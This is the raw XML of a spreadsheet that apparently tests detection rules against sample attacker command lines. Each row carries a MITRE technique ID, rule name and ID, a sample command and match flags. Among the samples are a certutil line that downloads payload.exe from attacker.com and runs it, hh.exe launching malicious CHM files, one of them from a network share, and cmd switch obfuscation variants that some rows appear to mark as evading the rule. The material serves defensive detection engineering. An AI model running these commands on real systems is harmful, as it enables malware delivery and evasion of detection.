    <row r="121" ht="15.75" customHeight="1" s="42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 ht="15.75" customHeight="1" s="42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 ht="15.75" customHeight="1" s="42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 ht="15.75" customHeight="1" s="42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 ht="15.75" customHeight="1" s="42">
      <c r="A125" s="34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15.75" customHeight="1" s="42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</row>
    <row r="127" ht="15.75" customHeight="1" s="42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</row>
    <row r="128" ht="15.75" customHeight="1" s="42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</row>
    <row r="129" ht="15.75" customHeight="1" s="42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</row>
    <row r="130" ht="15.75" customHeight="1" s="42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</row>
    <row r="131" ht="15.75" customHeight="1" s="42">
      <c r="A131" s="34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 ht="15.75" customHeight="1" s="42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</row>
    <row r="133" ht="15.75" customHeight="1" s="42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 ht="15.75" customHeight="1" s="42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</row>
    <row r="135" ht="15.75" customHeight="1" s="42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</row>
    <row r="136" ht="15.75" customHeight="1" s="42">
      <c r="A136" s="34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 ht="15.75" customHeight="1" s="42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 ht="15.75" customHeight="1" s="42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 ht="15.75" customHeight="1" s="42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 ht="15.75" customHeight="1" s="42">
      <c r="A140" s="34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15.75" customHeight="1" s="42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</row>
    <row r="142" ht="15.75" customHeight="1" s="42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</row>
    <row r="143" ht="15.75" customHeight="1" s="42">
      <c r="A143" s="34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</row>
    <row r="144" ht="15.75" customHeight="1" s="42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</row>
    <row r="145" ht="15.75" customHeight="1" s="42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</row>
    <row r="146" ht="15.75" customHeight="1" s="42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 ht="15.75" customHeight="1" s="42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</row>
    <row r="148" ht="15.75" customHeight="1" s="42">
      <c r="A148" s="34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 ht="15.75" customHeight="1" s="42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</row>
    <row r="150" ht="15.75" customHeight="1" s="42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</row>
    <row r="151" ht="15.75" customHeight="1" s="42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 ht="15.75" customHeight="1" s="42">
      <c r="A152" s="34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 ht="15.75" customHeight="1" s="42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 ht="15.75" customHeight="1" s="42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 ht="15.75" customHeight="1" s="42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15.75" customHeight="1" s="42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</row>
    <row r="157" ht="15.75" customHeight="1" s="42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</row>
    <row r="158" ht="15.75" customHeight="1" s="42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</row>
    <row r="159" ht="15.75" customHeight="1" s="42">
      <c r="A159" s="34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</row>
    <row r="160" ht="15.75" customHeight="1" s="42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</row>
    <row r="161" ht="15.75" customHeight="1" s="42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 ht="15.75" customHeight="1" s="42">
      <c r="A162" s="34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</row>
    <row r="163" ht="15.75" customHeight="1" s="42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 ht="15.75" customHeight="1" s="42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</row>
    <row r="165" ht="15.75" customHeight="1" s="42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</row>
    <row r="166" ht="15.75" customHeight="1" s="42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 ht="15.75" customHeight="1" s="42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 ht="15.75" customHeight="1" s="42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 ht="15.75" customHeight="1" s="42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 ht="15.75" customHeight="1" s="42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15.75" customHeight="1" s="42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</row>
    <row r="172" ht="15.75" customHeight="1" s="42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</row>
    <row r="173" ht="15.75" customHeight="1" s="42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</row>
    <row r="174" ht="15.75" customHeight="1" s="42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</row>
    <row r="175" ht="15.75" customHeight="1" s="42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</row>
    <row r="176" ht="15.75" customHeight="1" s="42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 ht="15.75" customHeight="1" s="42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</row>
    <row r="178" ht="15.75" customHeight="1" s="42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 ht="15.75" customHeight="1" s="42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</row>
    <row r="180" ht="15.75" customHeight="1" s="42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</row>
    <row r="181" ht="15.75" customHeight="1" s="42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 ht="15.75" customHeight="1" s="42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 ht="15.75" customHeight="1" s="42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 ht="15.75" customHeight="1" s="42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 ht="15.75" customHeight="1" s="42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15.75" customHeight="1" s="42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</row>
    <row r="187" ht="15.75" customHeight="1" s="42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</row>
    <row r="188" ht="15.75" customHeight="1" s="42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</row>
    <row r="189" ht="15.75" customHeight="1" s="42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</row>
    <row r="190" ht="15.75" customHeight="1" s="42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</row>
    <row r="191" ht="15.75" customHeight="1" s="42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 ht="15.75" customHeight="1" s="42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</row>
    <row r="193" ht="15.75" customHeight="1" s="42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 ht="15.75" customHeight="1" s="42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</row>
    <row r="195" ht="15.75" customHeight="1" s="42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</row>
    <row r="196" ht="15.75" customHeight="1" s="42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 ht="15.75" customHeight="1" s="42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 ht="15.75" customHeight="1" s="42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 ht="15.75" customHeight="1" s="42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 ht="15.75" customHeight="1" s="42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15.75" customHeight="1" s="42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</row>
    <row r="202" ht="15.75" customHeight="1" s="42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</row>
    <row r="203" ht="15.75" customHeight="1" s="42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</row>
    <row r="204" ht="15.75" customHeight="1" s="42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</row>
    <row r="205" ht="15.75" customHeight="1" s="42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</row>
    <row r="206" ht="15.75" customHeight="1" s="42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 ht="15.75" customHeight="1" s="42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</row>
    <row r="208" ht="15.75" customHeight="1" s="42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 ht="15.75" customHeight="1" s="42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</row>
    <row r="210" ht="15.75" customHeight="1" s="42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</row>
    <row r="211" ht="15.75" customHeight="1" s="42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 ht="15.75" customHeight="1" s="42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 ht="15.75" customHeight="1" s="42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 ht="15.75" customHeight="1" s="42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 ht="15.75" customHeight="1" s="42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15.75" customHeight="1" s="42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</row>
    <row r="217" ht="15.75" customHeight="1" s="42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</row>
    <row r="218" ht="15.75" customHeight="1" s="42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</row>
    <row r="219" ht="15.75" customHeight="1" s="42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</row>
    <row r="220" ht="15.75" customHeight="1" s="42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</row>
    <row r="221" ht="15.75" customHeight="1" s="42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 ht="15.75" customHeight="1" s="42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</row>
    <row r="223" ht="15.75" customHeight="1" s="42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 ht="15.75" customHeight="1" s="42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</row>
    <row r="225" ht="15.75" customHeight="1" s="42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</row>
    <row r="226" ht="15.75" customHeight="1" s="42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 ht="15.75" customHeight="1" s="42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 ht="15.75" customHeight="1" s="42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 ht="15.75" customHeight="1" s="42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 ht="15.75" customHeight="1" s="42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15.75" customHeight="1" s="42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</row>
    <row r="232" ht="15.75" customHeight="1" s="42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</row>
    <row r="233" ht="15.75" customHeight="1" s="42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</row>
    <row r="961" ht="15.75" customHeight="1" s="42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</row>
    <row r="962" ht="15.75" customHeight="1" s="42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</row>
    <row r="963" ht="15.75" customHeight="1" s="42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</row>
    <row r="964" ht="15.75" customHeight="1" s="42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</row>
    <row r="965" ht="15.75" customHeight="1" s="42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</row>
    <row r="966" ht="15.75" customHeight="1" s="42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</row>
    <row r="967" ht="15.75" customHeight="1" s="42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</row>
    <row r="968" ht="15.75" customHeight="1" s="42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</row>
    <row r="969" ht="15.75" customHeight="1" s="42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</row>
    <row r="970" ht="15.75" customHeight="1" s="42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</row>
    <row r="971" ht="15.75" customHeight="1" s="42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</row>
    <row r="972" ht="15.75" customHeight="1" s="42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</row>
    <row r="973" ht="15.75" customHeight="1" s="42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</row>
    <row r="974" ht="15.75" customHeight="1" s="42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</row>
    <row r="975" ht="15.75" customHeight="1" s="42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</row>
    <row r="976" ht="15.75" customHeight="1" s="42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</row>
    <row r="977" ht="15.75" customHeight="1" s="42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</row>
    <row r="978" ht="15.75" customHeight="1" s="42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</row>
    <row r="979" ht="15.75" customHeight="1" s="42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</row>
    <row r="980" ht="15.75" customHeight="1" s="42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</row>
    <row r="981" ht="15.75" customHeight="1" s="42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</row>
    <row r="982" ht="15.75" customHeight="1" s="42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</row>
    <row r="983" ht="15.75" customHeight="1" s="42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</row>
    <row r="984" ht="15.75" customHeight="1" s="42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</row>
    <row r="985" ht="15.75" customHeight="1" s="42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</row>
    <row r="986" ht="15.75" customHeight="1" s="42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</row>
    <row r="987" ht="15.75" customHeight="1" s="42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</row>
    <row r="988" ht="15.75" customHeight="1" s="42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</row>
    <row r="989" ht="15.75" customHeight="1" s="42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</row>
    <row r="990" ht="15.75" customHeight="1" s="42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</row>
    <row r="991" ht="15.75" customHeight="1" s="42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</row>
    <row r="992" ht="15.75" customHeight="1" s="42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</row>
    <row r="993" ht="15.75" customHeight="1" s="42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</row>
    <row r="994" ht="15.75" customHeight="1" s="42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</row>
    <row r="995" ht="15.75" customHeight="1" s="42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</row>
    <row r="996" ht="15.75" customHeight="1" s="42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</row>
    <row r="997" ht="15.75" customHeight="1" s="42"/>
    <row r="998" ht="15.75" customHeight="1" s="42"/>
    <row r="999" ht="15.75" customHeight="1" s="42"/>
    <row r="1000" ht="15.75" customHeight="1" s="42"/>
  </sheetData>
  <autoFilter ref="A1:K996"/>
  <dataValidations count="4">
    <dataValidation sqref="H2:H10" showDropDown="1" showInputMessage="0" showErrorMessage="1" allowBlank="1" type="list">
      <formula1>"TRUE,FALSE"</formula1>
    </dataValidation>
    <dataValidation sqref="J2:J10" showDropDown="1" showInputMessage="0" showErrorMessage="0" allowBlank="1" type="custom">
      <formula1>AND(ISNUMBER(J2),(NOT(OR(NOT(ISERROR(DATEVALUE(J2))), AND(ISNUMBER(J2), LEFT(CELL("format", J2))="D")))))</formula1>
    </dataValidation>
    <dataValidation sqref="A2:A14" showDropDown="0" showInputMessage="0" showErrorMessage="1" allowBlank="1" type="list">
      <formula1>"t1587.001,t1588.002,t1105,t1587,t1608"</formula1>
    </dataValidation>
    <dataValidation sqref="F2:G14" showDropDown="0" showInputMessage="0" showErrorMessage="1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1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2" min="1" max="1"/>
    <col width="59.14" customWidth="1" style="42" min="2" max="2"/>
    <col width="36" customWidth="1" style="42" min="3" max="3"/>
    <col width="38" customWidth="1" style="42" min="4" max="4"/>
    <col width="60" customWidth="1" style="42" min="5" max="5"/>
    <col width="18.43" customWidth="1" style="42" min="6" max="6"/>
    <col width="21.71" customWidth="1" style="42" min="7" max="7"/>
    <col width="18.57" customWidth="1" style="42" min="8" max="8"/>
    <col width="18.14" customWidth="1" style="42" min="9" max="9"/>
    <col width="18" customWidth="1" style="42" min="10" max="10"/>
    <col width="13" customWidth="1" style="42" min="11" max="11"/>
  </cols>
  <sheetData>
    <row r="1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15.75" customHeight="1" s="42">
      <c r="A2" s="44" t="inlineStr">
        <is>
          <t>t1204.002</t>
        </is>
      </c>
      <c r="B2" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_lnk_exec_hidden_cmd</t>
        </is>
      </c>
      <c r="C2" s="44" t="inlineStr">
        <is>
          <t>Suspicious LNK Command-Line Padding with Whitespace Characters</t>
        </is>
      </c>
      <c r="D2" s="44" t="inlineStr">
        <is>
          <t>dd8756e7-a3a0-4768-b47e-8f545d1a751c</t>
        </is>
      </c>
      <c r="E2" s="44" t="inlineStr">
        <is>
          <t>C:\Windows\System32\cmd.exe /c "certutil.exe -urlcache -f http://attacker.com/payload.exe C:\temp\p.exe &amp;&amp; C:\temp\p.exe"</t>
        </is>
      </c>
      <c r="F2" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G2" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2" s="43" t="n"/>
      <c r="J2" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K2" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3" ht="15.75" customHeight="1" s="42">
      <c r="A3" s="44" t="inlineStr">
        <is>
          <t>t1204.002</t>
        </is>
      </c>
      <c r="B3" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_lnk_exec_hidden_cmd</t>
        </is>
      </c>
      <c r="C3" s="44" t="inlineStr">
        <is>
          <t>Suspicious LNK Command-Line Padding with Whitespace Characters</t>
        </is>
      </c>
      <c r="D3" s="44" t="inlineStr">
        <is>
          <t>dd8756e7-a3a0-4768-b47e-8f545d1a751c</t>
        </is>
      </c>
      <c r="E3" s="44" t="inlineStr">
        <is>
          <t>C:\Windows\System32\cmd.exe /c "powershell.exe -Command Write-Host 'Malicious Payload Executed'"</t>
        </is>
      </c>
      <c r="F3" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G3" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3" s="43" t="n"/>
      <c r="J3" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K3" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4" ht="15.75" customHeight="1" s="42">
      <c r="A4" s="43" t="inlineStr">
        <is>
          <t>t1566.001</t>
        </is>
      </c>
      <c r="B4" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_double_extension</t>
        </is>
      </c>
      <c r="C4" s="43" t="inlineStr">
        <is>
          <t>Suspicious Double Extension File Execution</t>
        </is>
      </c>
      <c r="D4" s="43" t="inlineStr">
        <is>
          <t>1cdd9a09-06c9-4769-99ff-626e2b3991b8</t>
        </is>
      </c>
      <c r="E4" s="43" t="inlineStr">
        <is>
          <t>C:\Users\thaim\AppData\Local\Temp\T1036.007_masquerading.pdf".exe"</t>
        </is>
      </c>
      <c r="F4" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G4" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H4" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4" s="43" t="n"/>
      <c r="J4" s="43" t="n">
        <v>2</v>
      </c>
      <c r="K4" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="5" ht="15.75" customHeight="1" s="42">
      <c r="A5" s="43" t="inlineStr">
        <is>
          <t>t1566.001</t>
        </is>
      </c>
      <c r="B5" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_double_extension</t>
        </is>
      </c>
      <c r="C5" s="43" t="inlineStr">
        <is>
          <t>Suspicious Double Extension File Execution</t>
        </is>
      </c>
      <c r="D5" s="43" t="inlineStr">
        <is>
          <t>1cdd9a09-06c9-4769-99ff-626e2b3991b8</t>
        </is>
      </c>
      <c r="E5" s="43" t="inlineStr">
        <is>
          <t>C:\Users\thaim\AppData\Local\Temp\T1036.007_masquerading.pdf.lnk</t>
        </is>
      </c>
      <c r="F5" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G5" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H5" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I5" s="43" t="n"/>
      <c r="J5" s="43" t="n">
        <v>2</v>
      </c>
      <c r="K5" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="6" ht="15.75" customHeight="1" s="42">
      <c r="A6" s="43" t="inlineStr">
        <is>
          <t>t1566.001</t>
        </is>
      </c>
      <c r="B6" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_double_extension</t>
        </is>
      </c>
      <c r="C6" s="43" t="inlineStr">
        <is>
          <t>Suspicious Double Extension File Execution</t>
        </is>
      </c>
      <c r="D6" s="43" t="inlineStr">
        <is>
          <t>1cdd9a09-06c9-4769-99ff-626e2b3991b8</t>
        </is>
      </c>
      <c r="E6" s="43" t="inlineStr">
        <is>
          <t>"C:\Users\thaim\AppData\Local\Temp\T1036.007_masquerading.pdf .exe"</t>
        </is>
      </c>
      <c r="F6" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G6" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H6" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I6" s="43" t="n"/>
      <c r="J6" s="43" t="n">
        <v>2</v>
      </c>
      <c r="K6" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="7" ht="15.75" customHeight="1" s="42">
      <c r="A7" s="44" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B7" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C7" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D7" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E7" s="44" t="inlineStr">
        <is>
          <t>hh.exe C:\ProgramData\malicious.chm</t>
        </is>
      </c>
      <c r="F7" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G7" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H7" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I7" s="44" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J7" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K7" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="8" ht="15.75" customHeight="1" s="42">
      <c r="A8" s="44" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B8" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C8" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D8" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E8" s="44" t="inlineStr">
        <is>
          <t>hh.exe C:\ProgramData\help_document.chm</t>
        </is>
      </c>
      <c r="F8" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G8" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H8" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I8" s="44" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J8" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K8" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="9" ht="15.75" customHeight="1" s="42">
      <c r="A9" s="44" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B9" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C9" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D9" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E9" s="44" t="inlineStr">
        <is>
          <t>hh.exe C:\Users\Victim\APPDAT~1\Local\Temp\malicious.chm</t>
        </is>
      </c>
      <c r="F9" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G9" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H9" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I9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9" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K9" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="10" ht="15.75" customHeight="1" s="42">
      <c r="A10" s="44" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B10" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C10" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D10" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E10" s="44" t="inlineStr">
        <is>
          <t>hh.exe C:\Windows\System32\oobe\msoobe.chm</t>
        </is>
      </c>
      <c r="F10" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G10" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H10" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I10" s="44" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J10" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K10" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="11" ht="15.75" customHeight="1" s="42">
      <c r="A11" s="44" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B11" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C11" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D11" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E11" s="44" t="inlineStr">
        <is>
          <t>hh.exe C:\ProgramData\document.chm</t>
        </is>
      </c>
      <c r="F11" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G11" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H11" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I11" s="44" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J11" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K11" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="12" ht="15.75" customHeight="1" s="42">
      <c r="A12" s="44" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B12" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C12" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D12" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E12" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c cd C:\Users\Public\ &amp;&amp; hh.exe payload.chm</t>
        </is>
      </c>
      <c r="F12" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G12" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H12" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I12" s="44" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J12" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K12" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="13" ht="15.75" customHeight="1" s="42">
      <c r="A13" s="44" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B13" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C13" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D13" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E13" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /C cd C:\Users\Public\ &amp;&amp; hh.exe payload.chm</t>
        </is>
      </c>
      <c r="F13" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G13" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H13" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I13" s="44" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J13" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K13" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="14" ht="15.75" customHeight="1" s="42">
      <c r="A14" s="44" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B14" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C14" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D14" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E14" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /"c" cd C:\Users\Public\ &amp;&amp; hh.exe payload.chm</t>
        </is>
      </c>
      <c r="F14" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G14" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H14" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I14" s="43" t="n"/>
      <c r="J14" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K14" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="15" ht="15.75" customHeight="1" s="42">
      <c r="A15" s="44" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B15" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C15" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D15" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E15" s="44" t="inlineStr">
        <is>
          <t>cmd.exe -"c" cd C:\Users\Public\ &amp;&amp; hh.exe payload.chm</t>
        </is>
      </c>
      <c r="F15" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G15" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H15" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I15" s="43" t="n"/>
      <c r="J15" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K15" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="16" ht="15.75" customHeight="1" s="42">
      <c r="A16" s="44" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B16" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C16" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D16" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E16" s="44" t="inlineStr">
        <is>
          <t>hh.exe C:\ProgramData\update_help.chm</t>
        </is>
      </c>
      <c r="F16" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G16" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H16" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I16" s="44" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J16" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K16" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="17" ht="15.75" customHeight="1" s="42">
      <c r="A17" s="44" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B17" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C17" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D17" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E17" s="44" t="inlineStr">
        <is>
          <t>hh.exe \\192.168.1.100\share\payload.chm</t>
        </is>
      </c>
      <c r="F17" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G17" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H17" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I17" s="44" t="inlineStr">
        <is>
          <t>Remote CHM File Download/Execution Via HH.EXE (f57c58b3-ee69-4ef5-9041-455bf39aaa89); HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J17" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K17" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="18" ht="15.75" customHeight="1" s="42">
      <c r="A18" s="44" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B18" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C18" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D18" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E18" s="44" t="inlineStr">
        <is>
          <t>hh.exe C:\ProgramData\update.chm</t>
        </is>
      </c>
      <c r="F18" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G18" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H18" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I18" s="44" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J18" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K18" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="19" ht="15.75" customHeight="1" s="42">
      <c r="A19" s="44" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B19" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C19" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D19" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E19" s="44" t="inlineStr">
        <is>
          <t>hh.exe C:\Users\user\DOWNLO~1\malicious.chm</t>
        </is>
      </c>
      <c r="F19" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G19" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H19" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I19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9" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K19" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="20" ht="15.75" customHeight="1" s="42">
      <c r="A20" s="44" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B20" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C20" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D20" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E20" s="44" t="inlineStr">
        <is>
